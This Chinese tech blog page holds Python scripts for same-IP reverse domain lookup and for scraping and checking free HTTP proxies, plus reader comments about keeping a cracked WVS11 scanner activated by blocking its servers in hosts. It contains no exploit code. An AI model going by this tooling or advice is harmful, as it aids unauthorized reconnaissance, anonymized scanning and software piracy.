    regexp = r'''<a href='[^']+?([^']+?)' target=_blank>\1</a>'''
    regexp_next = r'''<a href="javascript:" val="%d" class="item[^"]*?">%d</a>'''
    url = 'http://s.tool.chinaz.com/same?s=%s&page=%d'

    page = 1
    while True:
        if page > 1:
            time.sleep(1)   #防止拒绝访问
        req = requests.get(url % (host , page) , headers=headers ,verify=False)
        html = req.content.decode('utf-8')  #取得页面
        for site in re.findall(regexp , html):
            ip2hosts.append("http://"+site)
        if re.search(regexp_next % (page+1 , page+1) , html) is None:
            return ip2hosts
            break
        page += 1
    return ip2hosts

def same_ip(host):
    mydomains = []
    mydomains.extend(ip2host_get(host))
    mydomains.extend(links_ip(host))
    mydomains.extend(aizhan(host))
    mydomains.extend(chinaz(host))
    mydomains = list(set(mydomains))
    p = Pool()
    for host in mydomains:
        p.apply_async(filter, args=(host,))
    p.close()
    p.join()


if __name__=="__main__":
    if len(sys.argv) == 2:
        same_ip(sys.argv[1])
    else:
        print ("usage: %s host" % sys.argv[0])
        sys.exit(-1)

 

python获取http代理

发布时间:July 24, 2016 // 分类:开发笔记,工作日志,运维工作,linux,python,windows // 7 Comments

主要是从http://www.ip181.com/ http://www.kuaidaili.com/以及http://www.66ip.com/获取相关的代理信息,并分别访问v2ex.com以及guokr.com以进行验证代理的可靠性。

# -*- coding=utf8 -*-
"""
    从网上爬取HTTPS代理
"""
import re
import sys
import time
import Queue
import logging
import requests
import threading
from pyquery import PyQuery
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()


#logging.basicConfig(
#    level=logging.DEBUG,
#    format="[%(asctime)s] %(levelname)s: %(message)s")

class Worker(threading.Thread):  # 处理工作请求
    def __init__(self, workQueue, resultQueue, **kwds):
        threading.Thread.__init__(self, **kwds)
        self.setDaemon(True)
        self.workQueue = workQueue
        self.resultQueue = resultQueue

    def run(self):
        while 1:
            try:
                callable, args, kwds = self.workQueue.get(False)  # get task
                res = callable(*args, **kwds)
                self.resultQueue.put(res)  # put result
            except Queue.Empty:
                break


class WorkManager:  # 线程池管理,创建
    def __init__(self, num_of_workers=10):
        self.workQueue = Queue.Queue()  # 请求队列
        self.resultQueue = Queue.Queue()  # 输出结果的队列
        self.workers = []
        self._recruitThreads(num_of_workers)

    def _recruitThreads(self, num_of_workers):
        for i in range(num_of_workers):
            worker = Worker(self.workQueue, self.resultQueue)  # 创建工作线程
            self.workers.append(worker)  # 加入到线程队列

    def start(self):
        for w in self.workers:
            w.start()

    def wait_for_complete(self):
        while len(self.workers):
            worker = self.workers.pop()  # 从池中取出一个线程处理请求
            worker.join()
            if worker.isAlive() and not self.workQueue.empty():
                self.workers.append(worker)  # 重新加入线程池中
        #logging.info('All jobs were complete.')

    def add_job(self, callable, *args, **kwds):
        self.workQueue.put((callable, args, kwds))  # 向工作队列中加入请求

    def get_result(self, *args, **kwds):
        return self.resultQueue.get(*args, **kwds)

def check_proxies(ip,port):
    """
    检测代理存活率
    分别访问v2ex.com以及guokr.com
    """
    proxies={'http': 'http://'+str(ip)+':'+str(port)}
    try:
        r0 = requests.get('http://v2ex.com', proxies=proxies,timeout=30,verify=False)
        r1 = requests.get('http://www.guokr.com', proxies=proxies,timeout=30,verify=False)

        if r0.status_code == requests.codes.ok and r1.status_code == requests.codes.ok and "09043258" in r1.content and "15015613" in r0.content:
            #r0.status_code == requests.codes.ok and r1.status_code == requests.codes.ok and 
            print ip,port
            return True
        else:
            return False

    except Exception, e:
        pass
        #sys.stderr.write(str(e))
        #sys.stderr.write(str(ip)+"\t"+str(port)+"\terror\r\n")
        return False

def get_ip181_proxies():
    """
    http://www.ip181.com/获取HTTP代理
    """
    proxy_list = []
    try:
        html_page = requests.get('http://www.ip181.com/',timeout=60,verify=False,allow_redirects=False).content.decode('gb2312')
        jq = PyQuery(html_page)
        for tr in jq("tr"):
            element = [PyQuery(td).text() for td in PyQuery(tr)("td")]
            if 'HTTP' not in element[3]:
                continue

            result = re.search(r'\d+\.\d+', element[4], re.UNICODE)
            if result and float(result.group()) > 5:
                continue
            #print element[0],element[1]
            proxy_list.append((element[0], element[1]))
    except Exception, e:
        sys.stderr.write(str(e))
        pass

    return proxy_list

def get_kuaidaili_proxies():
    """
    http://www.kuaidaili.com/获取HTTP代理
    """
    proxy_list = []
    for m in ['inha', 'intr', 'outha', 'outtr']:
        try:
            html_page = requests.get('http://www.kuaidaili.com/free/'+m,timeout=60,verify=False,allow_redirects=False).content.decode('utf-8')
            patterns = re.findall(r'(?P<ip>(?:\d{1,3}\.){3}\d{1,3})</td>\n?\s*<td.*?>\s*(?P<port>\d{1,4})',html_page)
            for element in patterns:
                #print element[0],element[1]
                proxy_list.append((element[0], element[1]))
        except Exception, e:
            sys.stderr.write(str(e))
            pass

    for n in range(0,11):
        try:
            html_page = requests.get('http://www.kuaidaili.com/proxylist/'+str(n)+'/',timeout=60,verify=False,allow_redirects=False).content.decode('utf-8')
            patterns = re.findall(r'(?P<ip>(?:\d{1,3}\.){3}\d{1,3})</td>\n?\s*<td.*?>\s*(?P<port>\d{1,4})',html_page)
            for element in patterns:
                #print element[0],element[1]
                proxy_list.append((element[0], element[1]))
        except Exception, e:
            sys.stderr.write(str(e))
            pass

    return proxy_list

def get_66ip_proxies():
    """
    http://www.66ip.com/ api接口获取HTTP代理
    """
    urllists = [
        'http://www.proxylists.net/http_highanon.txt',
        'http://www.proxylists.net/http.txt',
        'http://www.66ip.cn/nmtq.php?getnum=1000&anonymoustype=%s&proxytype=2&api=66ip',
        'http://www.66ip.cn/mo.php?sxb=&tqsl=100&port=&export=&ktip=&sxa=&submit=%CC%E1++%C8%A1'
        ]
    proxy_list = []
    for url in urllists:
        try:
            html_page = requests.get(url,timeout=60,verify=False,allow_redirects=False).content.decode('gb2312')
            patterns = re.findall(r'((?:\d{1,3}\.){1,3}\d{1,3}):([1-9]\d*)',html_page)
            for element in patterns:
                #print element[0],element[1]
                proxy_list.append((element[0], element[1]))
        except Exception, e:
            sys.stderr.write(str(e))
            pass

    return proxy_list


def get_proxy_sites():
    wm = WorkManager(20)
    proxysites = []
    proxysites.extend(get_ip181_proxies())
    proxysites.extend(get_kuaidaili_proxies())
    proxysites.extend(get_66ip_proxies())

    for element in proxysites:
        wm.add_job(check_proxies,str(element[0]),str(element[1]))
    wm.start()
    wm.wait_for_complete()


if __name__ == '__main__':
    try:
        get_proxy_sites()
    except Exception as exc:
        print(exc)

分类
最新文章
最近回复
  • 没穿底裤: 直接在hosts里面.激活的时候访问不到正确的地址
  • Sfish: 屏蔽更新是在控制台设置一下就可以了,还是说要在其他层面做一下限制,比如配置一下hosts让他升...
  • 没穿底裤: 激活,或者屏蔽地址禁止升级
  • 没穿底裤: 呃..这个思路不错啊..
  • Sfish: 博主好,想问一下,wvs11的破解版,是不是每隔一段时间就要重新激活一次才可以?有没有什么解决...